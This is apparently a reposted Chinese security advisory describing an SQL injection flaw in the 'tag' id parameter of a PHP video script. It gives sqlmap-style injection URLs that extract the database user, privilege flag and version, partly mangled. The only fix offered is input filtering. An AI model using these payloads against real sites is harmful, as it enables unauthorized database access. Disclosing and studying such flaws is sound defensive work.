php video script SQL注射缺陷及修复 - 网站安全

php video script SQL注射缺陷及修复 - 网站安全 - 自学

来源：自学PHP网时间：2015-04-17 13:03 作者：阅读:次

[导读] 标题: php video script SQL Injection Vulnerability作者: longrifle0x www.2cto.com www.security-research.ge下载地址:http://www.alurian.com/php-video-script/测试工具: SQLMAP概述在video_tags......

标题: php video script SQL Injection Vulnerability

作者: longrifle0x www.2cto.com www.security-research.ge

下载地址:http://www.alurian.com/php-video-script/

测试工具: SQLMAP

概述

在video_tags发现SQL injection.

*测试方法*

link: http://www.2cto.com /tag <http://www.2cto.com /tag>

vulnerability link: http://www.2cto.com /tag <http://www.2cto.com /tag>'

http://www.2cto.com /tag'/index.php?id=1

<http://www.2cto.com /tag'/index.php?id=1> [GET][id=-1][CURRENT_USER()

http://www.2cto.com /tag'/index.php?id=1[GET][id=-1][SELECT(CASE

<http://www.2cto.com /tag'/index.php?id=1[GET][id=-1][SELECT(CASE> WHEN

((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT 0,1)='Y')

THEN 1 ELSE 0 END)

http://www.2cto.com /tag'/index.php?id=1[GET][id=-1][MID((VERSION()),1,6)

<http://www.2cto.com /tag'/index.php?id=1[GET][id=-1][MID((VERSION()),1,6)>

www.2cto.com修复

过滤上述页面的参数输入

冰山信息发布系统后台登陆漏洞及修复 - 网站安

基于PHP+MySQL渗透测试中load_file()函数淫荡用法 -

子栏目

php video script SQL注射缺陷及修复 - 网站安全 - 自学

最新评论

添加评论

更多文章推荐

添加评论